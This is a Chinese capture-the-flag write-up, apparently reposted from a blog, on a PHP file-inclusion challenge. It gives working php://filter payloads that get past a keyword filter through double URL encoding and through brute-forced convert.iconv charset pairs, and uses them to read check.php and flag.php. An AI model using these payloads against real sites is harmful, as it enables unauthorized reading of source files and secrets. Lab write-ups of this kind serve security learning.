文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

泰山杯:文件包含

2023-09-10 09:57

关注

在这里插入图片描述

很明显的一个文件包含点,而且还包含了check.php文件
尝试使用伪协议去读取check.php文件内容
?filename=php://filter/read=convert.base64-encode/resource=check.php
在这里插入图片描述

很明显存在过滤,简单测了下,对read和base64关键字进行了过滤
简单的进行绕过:
?filename=php://filter/=convert.ba%2573e64-encode/resource=check.php
在这里插入图片描述

显示you have use the right usage , but error method,方法错误,换个iconv过滤器尝试下
使用convert.iconv.*过滤器等同于用iconv()函数处理所有的流数据

convery.iconv.*的使用有两种方法:convert.iconv..  convert.iconv./

支持的编码字符集如下所示:

UCS-4*UCS-4BEUCS-4LE*UCS-2UCS-2BEUCS-2LEUTF-32*UTF-32BE*UTF-32LE*UTF-16*UTF-16BE*UTF-16LE*UTF-7UTF7-IMAPUTF-8*ASCII*EUC-JP*SJIS*eucJP-win*SJIS-win*ISO-2022-JPISO-2022-JP-MSCP932CP51932...#具体支持的编码可见php官方文档:https://www.php.net/manual/zh/mbstring.supported-encodings.php

随便拿两个字符集构造payload进行尝试
/?filename=php://filter/convert.iconv.UCS-4*.UCS-4BE/resource=check.php
在这里插入图片描述

提示使用了正确的过滤器,但用法错误,那可以尝试通过上述字符集作为字典,进行交叉爆破尝试
在这里插入图片描述
在这里插入图片描述

没有看到flag信息,既然能进行任意文件读取了,尝试读下flag.php
根据爆破的字符集构造payload
?filename=php://filter/convert.iconv.EUC-JP%2a.UCS-4*/resource=flag.php

在这里插入图片描述

来源地址:https://blog.csdn.net/qq_36618918/article/details/128674773

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯